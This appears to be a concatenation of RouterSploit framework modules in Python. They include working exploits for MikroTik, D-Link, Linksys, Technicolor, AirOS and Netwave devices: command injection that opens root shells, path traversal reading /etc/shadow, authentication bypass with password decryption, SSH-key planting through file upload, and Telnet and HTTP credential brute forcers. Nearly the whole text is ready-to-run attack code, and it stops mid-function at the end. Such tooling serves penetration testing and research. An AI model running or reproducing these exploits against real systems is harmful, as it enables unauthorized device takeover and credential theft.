import re
from struct import pack, unpack
from routersploit.core.exploit import *
from routersploit.core.ssh.ssh_client import SSHClient


class Exploit(SSHClient):
    __info__ = {
        "name": "Mikrotik RouterOS Jailbreak",
        "description": "Module creates \"devel\" user on RouterOS from 2.9.8 to 6.41rc56.",
        "authors": (
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://github.com/0ki/mikrotik-tools",
        ),
        "devices": (
            "Mikrotik RoutersOS versions from 2.9.8 up to 6.41rc56",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(22, "Target SSH port")

    username = OptString("admin", "Username to log in with")
    password = OptString("", "Password to log in with")

    def __init__(self):
        self.ssh_client = None

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            if self.backup_configuration():
                print_status("Downloading current configuration...")
                content = self.ssh_client.get_content("/backup.backup")

                backup = self.backup_patch(content)
                if backup:
                    print_status("Uploading exploit...")
                    if self.backup_restore(backup):
                        print_success("Jailbreak was (likely) successful.")
                        print_success("Linux mode can be accessed via telnet using: devel/{}".format(self.password))
                    else:
                        print_error("Unable to apply patched configuration")
            else:
                print_error("Unable to export current configuration")

    @mute
    def check(self):
        self.ssh_client = self.ssh_create()

        if self.ssh_client.login(self.username, self.password):
            output = self.ssh_client.execute("/system resource print")

            res = re.findall(b"version: (.+?) ", output)
            if res:
                version = str(res[0], "utf-8")
                if "rc" in version:
                    version, rc = version.split("rc")
                    if version == "6.41" and int(rc) > 56:
                        return False

                if utils.Version("2.9.8") <= utils.Version(version) <= utils.Version("6.42"):
                    return True

        return False

    def backup_configuration(self):
        output = self.ssh_client.execute("/system backup save name=\"backup.backup\" dont-encrypt=yes")
        if b"backup saved" in output:
            return True
        else:
            output = self.ssh_client.execute("/system backup save name=\"backup.backup\"")
            if b"backup saved" in output:
                return True

        return False

    def backup_patch(self, backup):
        realsize = len(backup)
        if realsize < 8 or backup[:4] != b"\x88\xAC\xA1\xB1":
            print_error("Please check if that is a recent RouterOS backup file w/o password protection.")
            return False

        matchsize, = unpack("<I", backup[4:8])
        if matchsize != realsize:
            print_error("File is damaged. Aborting...")
            return False

        # first we write our payload
        payload = (
            b"\x1E\x00\x00\x00\x2E\x2E\x2F\x2E\x2E\x2F\x2E\x2E\x2F"
            b"\x6E\x6F\x76\x61\x2F\x65\x74\x63\x2F\x64\x65\x76\x65\x6C\x2D"
            b"\x6C\x6F\x67\x69\x6E\x2F\x00\x00\x00\x00\x00\x00\x00\x00"
        )
        matchsize += len(payload)
        backup = backup[:4] + pack("<I", matchsize) + backup[8:] + payload

        print_status("Patching done")
        return backup

    def backup_restore(self, backup):
        self.ssh_client.send_content(backup, "/backup.backup")

        output = self.ssh_client.execute("/system backup load name=\"backup.backup\" password=\"\"")
        if b"configuration restored" in output:
            return True
        else:
            output = self.ssh_client.execute("/system backup load name=\"backup.backup\"")
            if b"configuration restored" in output:
                return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link PingTest RCE",
        "description": "Module exploits unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. "
                       "The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. "
                       "An attacker who successfully triggers the command injection could achieve full system compromise. "
                       "Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.",
        "authors": (
            "FortiGuard Labs",  # vulnerability discovery and metasploit module
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://nvd.nist.gov/vuln/detail/CVE-2019-16920",
            "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124",
            "https://www.fortinet.com/blog/threat-research/d-link-routers-found-vulnerable-rce.html",
            "http://kb.cert.org/artifacts/cve-2019-16920.html",
        ),
        "devices": (
            "DAP-1533 < v1.02B",
            "DGL-5500 < v1.13b04",
            "DIR-130 < v1.23b20",
            "DIR-330 < v1.23b18",
            "DIR-615 < v9.04NAb02",
            "DIR-655 < v3.02b05",
            "DIR-825 < v3.02",
            "DIR-835 < v104b02Beta01",
            "DIR-855L < v1.03b01",
            "DIR-866L < v1.03b04",
            "DHP-1565 < v1.01",
            "DIR-652 < v2.00B40",
            "DIR-862 < v1.02",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available")
            shell(self, architecture="mipsle", method="echo", location="/var/tmp/")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        headers = {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Cookie": "uid=1234123",
            "Referer": "http://{}:{}/login_pic.asp".format(self.target, self.port),
        }
        data = {
            "html_response_page": "login_pic.asp",
            "action": "ping_test",
            "ping_ipaddr": "127.0.0.1%0a{}".format(cmd)
        }

        response = self.http_request(
            method="POST",
            path="/apply_sec.cgi",
            headers=headers,
            data=data
        )
        if response is None:
            return ""

        return response.text.strip()

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)

        if mark in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Linksys SMART WiFi Password Disclosure",
        "description": "Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. "
                       "If target is vulnerable administrator's MD5 passsword is retrieved.",
        "authors": (
            "Sijmen Ruwhof",  # vulnerability discovery
            "0BuRner",  # routersploit module
        ),
        "references": (
            "https://www.kb.cert.org/vuls/id/447516",
            "http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers",
            "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243",
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243",
        ),
        "devices": (
            "Linksys EA2700 < Ver.1.1.40 (Build 162751)",
            "Linksys EA3500 < Ver.1.1.40 (Build 162464)",
            "Linksys E4200v2 < Ver.2.1.41 (Build 162351)",
            "Linksys EA4500 < Ver.2.1.41 (Build 162351)",
            "Linksys EA6200 < Ver.1.1.41 (Build 162599)",
            "Linksys EA6300 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6400 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6500 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6700 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6900 < Ver.1.1.42 (Build 161129)",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            response = self.http_request(
                method="GET",
                path="/.htpasswd"
            )
            if response is None:
                print_error("Exploit failed - connection error")
                return

            if (response.text.find('$') != -1):
                print_info("Likely Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
            else:
                print_info("Likely base64 encoded .htaccess")  # John understands this natively

            print_success("Hash found:", response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):

        response = self.http_request(
            method="GET",
            path="/.htpasswd"
        )

        if response is not None and response.status_code == 200:
            res = re.findall(r"^([a-zA-Z0-9]+:\S+)", response.text)
            if len(res):
                return True

        return False



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Linksys WAP54Gv3",
        "description": "Module exploits remote command execution in Linksys WAP54Gv3 devices. "
                       "Debug interface allows executing root privileged shell commands is available "
                       "on dedicated web pages on the device.",
        "authors": (
            "Phil Purviance",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://seclists.org/bugtraq/2010/Jun/93",
        ),
        "devices": (
            "Linksys WAP54Gv3",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        data = {"data1": cmd, "command": "ui_debug"}

        response = self.http_request(
            method="POST",
            path="/debug.cgi",
            data=data,
            auth=("Gemtek", "gemtekswd")
        )
        if response is None:
            return ""

        res = re.findall('<textarea rows=30 cols=100>(.+?)</textarea>', response.text, re.DOTALL)

        if len(res):
            return res[0]

        return ""

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)

        if mark in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from hashlib import md5

from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient


class Exploit(TCPClient):
    __info__ = {
        "name": "Mikrotik WinBox Auth Bypass - Creds Disclosure",
        "description": "Module bypass authentication through WinBox service in Mikrotik devices "
                       "versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) "
                       "and retrieves administrative credentials.",
        "authors": (
            "Alireza Mosajjal",  # vulnerability discovery, poc exploit
            "Mostafa Yalpaniyan",  # vulnerablity discovery, poc exploit
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://n0p.me/winbox-bug-dissection/",
            "https://github.com/BasuCert/WinboxPoC",
        ),
        "devices": (
            "Mikrotik RouterOS versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20)",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8291, "Target WinBox service")

    def __init__(self):
        self.packet_a = (
            b"\x68\x01\x00\x66\x4d\x32\x05\x00\xff\x01\x06\x00\xff\x09\x05\x07"
            b"\x00\xff\x09\x07\x01\x00\x00\x21\x35\x2f\x2f\x2f\x2f\x2f\x2e\x2f"
            b"\x2e\x2e\x2f\x2f\x2f\x2f\x2f\x2f\x2e\x2f\x2e\x2e\x2f\x2f\x2f\x2f"
            b"\x2f\x2f\x2e\x2f\x2e\x2e\x2f\x66\x6c\x61\x73\x68\x2f\x72\x77\x2f"
            b"\x73\x74\x6f\x72\x65\x2f\x75\x73\x65\x72\x2e\x64\x61\x74\x02\x00"
            b"\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88"
            b"\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00"
        )

        self.packet_b = (
            b"\x3b\x01\x00\x39\x4d\x32\x05\x00\xff\x01\x06\x00\xff\x09\x06\x01"
            b"\x00\xfe\x09\x35\x02\x00\x00\x08\x00\x80\x00\x00\x07\x00\xff\x09"
            b"\x04\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01"
            b"\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00"
        )

    def run(self):
        creds = self.get_creds()
        if creds:
            print_success("Target seems to be vulnerable")
            print_status("Dumping credentials")
            print_table(("Username", "Password"), *creds)
        else:
            print_error("Exploit failed - target does not seem to be vulnerable")

    @mute
    def check(self):
        creds = self.get_creds()
        if creds:
            return True  # target is vulnerable

        return False  # target is not vulnerable

    def get_creds(self):
        creds = []

        tcp_client = self.tcp_create()
        tcp_client.connect()

        tcp_client.send(self.packet_a)
        data = tcp_client.recv(1024)

        if not data or len(data) < 39:
            return None

        packet = self.packet_b[:19] + data[38:39] + self.packet_b[20:]

        tcp_client.send(packet)
        data = tcp_client.recv(1024)

        if not data:
            return None

        tcp_client.close()

        creds = self.get_pair(data)
        if not creds:
            return None

        return creds

    def decrypt_password(self, user, pass_enc):
        key = md5(user + b"283i4jfkai3389").digest()

        passw = ""
        for i in range(0, len(pass_enc)):
            passw += chr(pass_enc[i] ^ key[i % len(key)])

        return passw.split("\x00")[0]

    def extract_user_pass_from_entry(self, entry):
        user_data = entry.split(b"\x01\x00\x00\x21")[1]
        pass_data = entry.split(b"\x11\x00\x00\x21")[1]

        user_len = user_data[0]
        pass_len = pass_data[0]

        username = user_data[1:1 + user_len]
        password = pass_data[1:1 + pass_len]

        return username, password

    def get_pair(self, data):
        user_list = []

        entries = data.split(b"M2")[1:]
        for entry in entries:
            try:
                user, pass_encrypted = self.extract_user_pass_from_entry(entry)
            except Exception:
                continue

            pass_plain = self.decrypt_password(user, pass_encrypted)
            user = user.decode("ascii")

            user_list.append((user, pass_plain))

        return user_list



from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.option import OptInteger
from routersploit.core.exploit.printer import (
    print_error,
    print_status
)
from routersploit.core.bluetooth.btle import (
    ScanDelegate,
    BTLEScanner
)


class Options:
    """ Options used by the scanner """

    def __init__(self, buffering, mac, enum_services):
        self.buffering = buffering
        self.mac = mac
        self.enum_services = enum_services


class BTLEClient(Exploit):
    """ Bluetooth Low Energy Client implementation """

    scan_time = OptInteger(10, "Number of seconds to scan for")
    buffering = False
    enum_services = False

    def btle_scan(self, mac=None):
        """ Scans for Bluetooth Low Energy devices """

        options = Options(
            self.buffering,
            mac,
            self.enum_services
        )

        scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options))

        if options.mac:
            print_status("Scanning BTLE device...")
        else:
            print_status("Scanning for BTLE devices...")

        devices = []
        try:
            devices = [res for res in scanner.scan(self.scan_time)]
        except Exception as err:
            print_error("Error: {}".format(err))
            print_error("Check if your bluetooth hardware is connected")

        return devices



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DSL-2730U/2750U/2750E Path Traversal",
        "description": "Module exploits D-Link DSL-2730U/2750U/2750E Path Traversal "
                       "vulnerability which allows to read any file on the system.",
        "authors": (
            "Todor Donev <todor.donev[at]gmail.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40735/",
        ),
        "devices": (
            "D-Link DSL-2730U",
            "D-Link DSL-2750U",
            "D-Link DSL-2750E",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/shadow", "File to read")

    def run(self):
        if self.check():
            path = "/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us" \
                   "&var:menu=setup&var:page=wizard".format(self.filename)

            response = self.http_request(
                method="GET",
                path=path
            )
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Success! File: %s" % self.filename)
                print_info(response.text)
            else:
                print_error("Exploit failed")
        else:
            print_error("Device seems to be not vulnerable")

    @mute
    def check(self):
        path = "/cgi-bin/webproc?getpage=/etc/passwd&errorpage=html/main.html&var:language=en_us" \
               "&var:menu=setup&var:page=wizard"

        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return False  # target is not vulnerable

        if utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target vulnerable

        return False  # target is not vulnerable



import binascii
import struct
from Crypto.Cipher import AES
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Technicolor TC7200 Password Disclosure V2",
        "description": "Module exploits Technicolor TC7200 password disclosure vulnerability which "
                       "allows fetching administration's password.",
        "authors": (
            "Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)",  # vulnerability discovery
            "0BuRner",  # routersploit module
            "Bastian Germann",  # improved vulnerability check
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40157/",
            "http://www.search-lab.hu/advisories/secadv-20160720",
        ),
        "devices": (
            "Technicolor TC7200",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            response = self.http_request(
                method="GET",
                path="/goform/system/GatewaySettings.bin",
            )
            return None

            if response is not None and response.status_code == 200:
                print_status("Reading GatewaySettings.bin...")

                plain = self.decrypt_backup(response.content)
                name, pwd = self.parse_backup(plain)

                print_success('Exploit success! login: {}, password: {}'.format(name, pwd))
            else:
                print_error("Exploit failed. Could not extract config file.")
        else:
            print_error("Target is not vulnerable")

    @staticmethod
    def parse_backup(backup):
        p = backup.find('MLog')
        if p > 0:
            p += 6
            nh = struct.unpack('!H', backup[p:p + 2])[0]
            name = backup[p + 2:p + 2 + nh]
            p += 2 + nh
            pwd = backup[p + 2:p + 2 + nh]
            return name, pwd
        return '', ''

    @staticmethod
    def decrypt_backup(backup):
        key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
        length = (len(backup) / 16) * 16
        cipher = AES.new(key, AES.MODE_ECB)
        plain = cipher.decrypt(backup[0:length])
        return plain

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/goform/system/GatewaySettings.bin",
        )

        encr_zero_block = binascii.unhexlify('F29000B62A499FD0A9F39A6ADD2E7780')
        if response is not None and response.status_code == 200 and encr_zero_block in response.content:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DSP-W110 RCE",
        "description": "Module exploits D-Link DSP-W110 Remote Command Execution vulnerability "
                       "which allows executing command on the operating system level.",
        "authors": (
            "Peter Adkins <peter.adkins[at]kernelpicnic.net",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110",
        ),
        "devices": (
            "D-Link DSP-W110 (Rev A) - v1.05b01",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_status("Target might be vulnerable - difficult to verify")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available.")
            print_status("Spawn root shell with telnetd -l/bin/sh")
            shell(self, architecture="mipsbe")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        if len(cmd) > 18:
            print_error("Command too long. Max is 18 characters.")
            return ""

        payload = "`{}`".format(cmd)
        cookies = {"i": payload}

        self.http_request(
            method="GET",
            path="/",
            cookies=cookies
        )
        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/"
        )
        if response is not None and "Server" in response.headers.keys() and "lighttpd/1.4.34" in response.headers['Server']:
            return True  # target is vulnerable

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Basler Camera Default Web Interface Creds - HTTP Form",
        "description": "Module performs dictionary attack against Basler Camera Web Interface. "
                       "If valid credentials are found, they are displayed to the user.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Basler Camera",
        )
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(80, "Target HTTP port")

    threads = OptInteger(1, "Number of threads")
    defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")

    stop_on_success = OptBool(True, "Stop on first valid authentication attempt")
    verbosity = OptBool(True, "Display authentication attempts")

    def run(self):
        self.credentials = []
        self.attack()

    @multi
    def attack(self):
        if not self.check():
            return

        print_status("Starting default creds attack against web interface")

        data = LockedIterator(self.defaults)
        self.run_threads(self.threads, self.target_function, data)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Service", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

    def target_function(self, running, creds):
        while running.is_set():
            try:
                username, password = creds.next().split(":", 1)

                data = {
                    "Auth.Username": username,
                    "Auth.Password": password,
                }
                response = self.http_request(
                    method="POST",
                    path="/cgi-bin/auth_if.cgi?Login",
                    data=data
                )

                if response and "success: true" in response.text:
                    self.credentials.append((self.target, self.port, self.target_protocol, username, password))

            except StopIteration:
                break

    def check(self):
        data = {
            "Auth.Username": "",
            "Auth.Password": "",
        }
        response = self.http_request(
            method="POST",
            path="/cgi-bin/auth_if.cgi?Login",
            data=data
        )

        if response and "success: " in response.text:
            return True

        return False

    @mute
    def check_default(self):
        if self.check():
            self.credentials = []

            data = LockedIterator(self.defaults)
            self.run_threads(self.threads, self.target_function, data)

            if self.credentials:
                return self.credentials

        return None



import tempfile
from io import StringIO
import paramiko
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.ssh.ssh_client import SSHClient


class Exploit(HTTPClient, SSHClient):
    __info__ = {
        "name": "AirOS 6.x - Arbitrary File Upload",
        "description": "Exploit implementation for AirOS 6.x - Arbitrary File Upload. "
                       "If the target is vulnerable is possible to take full control of the router.",
        "authors": (
            "93c08539",  # vulnerability discovery
            "Vinicius Henrique Marangoni",  # routersploit module
        ),
        "references": (
            "https://hackerone.com/reports/73480",
            "https://www.exploit-db.com/exploits/39701/",
        ),
        "devices": (
            "AirOS 6.x",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(443, "Target HTTP port")
    ssl = OptBool(True, "SSL enabled: true/false")

    ssh_port = OptPort(22, "Target SSH Port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_success("Trying to exploit by uploading SSH public key")

            key = paramiko.RSAKey.generate(1024)
            public_key = key.get_base64()
            private_key = StringIO()
            key.write_private_key(private_key)

            tmp_file_pubkey = tempfile.TemporaryFile()
            tmp_file_pubkey.write(bytes("ssh-rsa " + public_key, "utf-8"))
            tmp_file_pubkey.seek(0)

            upload_params = {"file": ("../../etc/dropbear/authorized_keys", tmp_file_pubkey, {"Expect": ""})}

            response = self.http_request(
                method="POST",
                path="/login.cgi",
                files=upload_params
            )

            if response is None:
                print_error("Exploit failed - Something was wrong while uploading the SSH Public Key")
                return

            print_success("Appareantly the exploit worked fine")
            print_success("Trying to invoke a interactive SSH Shell")

            ssh_client = self.ssh_create()
            if ssh_client.login_pkey("ubnt", private_key.getvalue()):
                ssh.interactive()

        else:
            print_error("Exploit failed - target is not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/login.cgi"
        )

        if response is None:
            return False  # Target not vulnerable

        rand_str = utils.random_text(16)
        mark = "vulnerable{}".format(rand_str)

        tmp_payload = tempfile.TemporaryFile()
        tmp_payload.write(mark.encode())
        tmp_payload.seek(0)

        upload_params = {"file": ("../../../../tmp/airview.uavr", tmp_payload, {"Expect": ""})}

        response = self.http_request(
            method="GET",
            path="/login.cgi",
            files=upload_params
        )

        tmp_payload.close()

        if response is None:
            return False  # Target not vulnerable

        # Response to verify if the upload was done correctly
        verify_upload = self.http_request(
            method="GET",
            path="/airview.uavr"
        )

        # Upload empty file to "clear" the airview.uavr file
        clean_tmp_file = tempfile.TemporaryFile()
        clean_tmp_file.seek(0)

        upload_params = {"file": ("../../../../tmp/airview.uavr", clean_tmp_file, {"Expect": ""})}

        self.http_request(
            method="POST",
            path="/login.cgi",
            files=upload_params
        )

        clean_tmp_file.close()

        if mark in verify_upload.text:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netwave IP Camera Information Disclosure",
        "description": "This exploit will try to retrieve WPA password and ddns host name, "
                       "Also it would try to read memory leak in order to find username and password",
        "authors": (
            "spiritnull",  # exploit-db.com exploit
            "renos stoikos <rstoikos[at]gmail.com>",  # routesploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/41236/",
        ),
        "devices": (
            "Netwave IP Camera",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            response = self.http_request(
                method="GET",
                path="//etc/RT2870STA.dat",
            )

            if response is not None and "WPAPSK" in response.text:
                print_success("WPA Password is in this text:")
                print_info(response.text)
            else:
                print_error("Could not find WPA password")

            print_info("Trying to gather more info")
            response = self.http_request(
                method="GET",
                path="/get_status.cgi",
            )
            if response is not None and "ddns_host" in response.text:
                print_success("ddns host name:")
                print_info(response.text)
            else:
                print_error("could not read ddns host name")

            print_status("Trying to find username and password from running memory leak")
            print_status("This could take some time")
            print_status("password is usually stuck next to 'admin' e.g admin123456")
            response = self.http_request(
                method="GET",
                path="//proc/kcore",
                stream=True
            )
            try:
                for chunk in response.iter_content(chunk_size=100):
                    if "admin" in chunk:
                        print_success(chunk)
            except Exception:
                print_error("Exploit failed - could not read /proc/kcore")

    @mute
    def check(self):
        check1 = self.http_request(
            method="GET",
            path="//etc/RT2870STA.dat",
        )
        if check1 is not None and check1.status_code == 200 and "WPAPSK" in check1.text:
            return True

        check2 = self.http_request(
            method="GET",
            path="/get_status.cgi",
        )

        if check2 is not None and check2.status_code == 200 and "ddns" in check2.text:
            return True

        return False



from routersploit.modules.scanners.autopwn import Exploit


class Exploit(Exploit):
    __info__ = {
        "name": "Router Scanner",
        "description": "Module that scans for routers vulnerablities and weaknesses.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Router",
        ),
    }

    modules = ["generic", "routers"]



import itertools
from routersploit.core.exploit import *
from routersploit.core.telnet.telnet_client import TelnetClient
from routersploit.resources import wordlists


class Exploit(TelnetClient):
    __info__ = {
        "name": "Telnet Bruteforce",
        "description": "Module performs bruteforce attack against Telnet service. "
                       "If valid credentials are found, they are displayed to the user.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Multiple devices",
        )
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(23, "Target Telnet port")

    threads = OptInteger(8, "Number of threads")

    usernames = OptWordlist("admin", "Username or file with usernames (file://)")
    passwords = OptWordlist(wordlists.passwords, "Password or file with passwords (file://)")

    stop_on_success = OptBool(True, "Stop on first valid authentication attempt")
    verbosity = OptBool(True, "Display authentication attempts")

    def run(self):
        self.credentials = []
        self.attack()

    @multi
    def attack(self):
        if not self.check():
            return

        print_status("Starting bruteforce attack against Telnet service")

        data = LockedIterator(itertools.product(self.usernames, self.passwords))
        self.run_threads(self.threads, self.target_function, data)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Service", "Username", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

    def target_function(self, running, data):
        while running.is_set():
            try:
                username, password = data.next()
                telnet_client = self.telnet_create()
                if telnet_client.login(username, password, retries=3):
                    if self.stop_on_success:
                        running.clear()

                    self.credentials.append((self.target, self.port, self.target_protocol, username, password))
                    telnet_client.close()

            except StopIteration:
                break

    def check(self):
        telnet_client = self.telnet_create()
        if telnet_client.test_connect():
            print_status("Target exposes Telnet service", verbose=self.verbosity)
            return True

        print_status("Target does not expose Telnet service", verbose=self.verbosity)
        return False

    @mute
    def check_default(self):
        if self.check():
            self.credentials = []

            data = LockedIterator(itertools.product(self.usernames, self.passwords))
            self.run_threads(self.threads, self.target_function, data)

            if self.credentials:
                return self.credentials

        return None



import itertools
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.resources import wordlists
from requests.auth import HTTPDigestAuth


class Exploit(HTTPClient):
    __info__ = {
        "name": "HTTP Basic/Digest Bruteforce",
        "description": "Module performs bruteforce attack against HTTP Basic/Digest Auth service. "
                       "If valid credentials are found, they are displayed to the user.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
            "Alexander Yakovlev <https://github.com/toxydose>",  # upgrading to perform bruteforce attack against HTTP Digest Auth service
        ),
        "devices": (
            "Multiple devices",
        )
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(80, "Target HTTP port")

    threads = OptInteger(8, "Number of threads")

    usernames = OptWordlist("admin", "Username or file with usernames (file://)")
    passwords = OptWordlist(wordlists.passwords, "Password or file with passwords (file://)")

    path = OptString("/", "URL Path")

    stop_on_success = OptBool(True, "Stop on first valid authentication attempt")
    verbosity = OptBool(True, "Display authentication attempts")

    def run(self):
        self.credentials = []
        self.auth_type = None

        self.attack()

    @multi
    def attack(self):
        if not self.check():
            return

        print_status("Starting bruteforce attack against {}".format(self.path))

        data = LockedIterator(itertools.product(self.usernames, self.passwords))
        self.run_threads(self.threads, self.target_function, data)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Service", "Username", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

    def target_function(self, running, data):
        while running.is_set():
            try:
                username, password = data.next()

                if self.auth_type == "digest":
                    auth = HTTPDigestAuth(username, password)
                else:
                    auth = (username, password)

                response = self.http_request(
                    method="GET",
                    path=self.path,
                    auth=auth,
                )

                if response is not None and response.status_code != 401:
                    if self.stop_on_success:
                        running.clear()

                    print_success("Authentication Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
                    self.credentials.append((self.target, self.port, self.target_protocol, username, password))
                else:
                    print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
            except StopIteration:
                break

    def check(self):
        response = self.http_request(
            method="GET",
            path=self.path
        )

        if response is None:
            return False

        if response.status_code != 401 or "WWW-Authenticate" not in response.headers.keys():
            print_error("Resource {} is not protected by Basic/Digest Auth".format(self.path), verbose=self.verbosity)
            return False

        if "Basic" in response.headers["WWW-Authenticate"]:
            print_status("Target exposes resource {} protected by Basic Auth".format(self.path), verbose=self.verbosity)
            self.auth_type = "basic"
            return True
        elif "Digest" in response.headers["WWW-Authenticate"]:
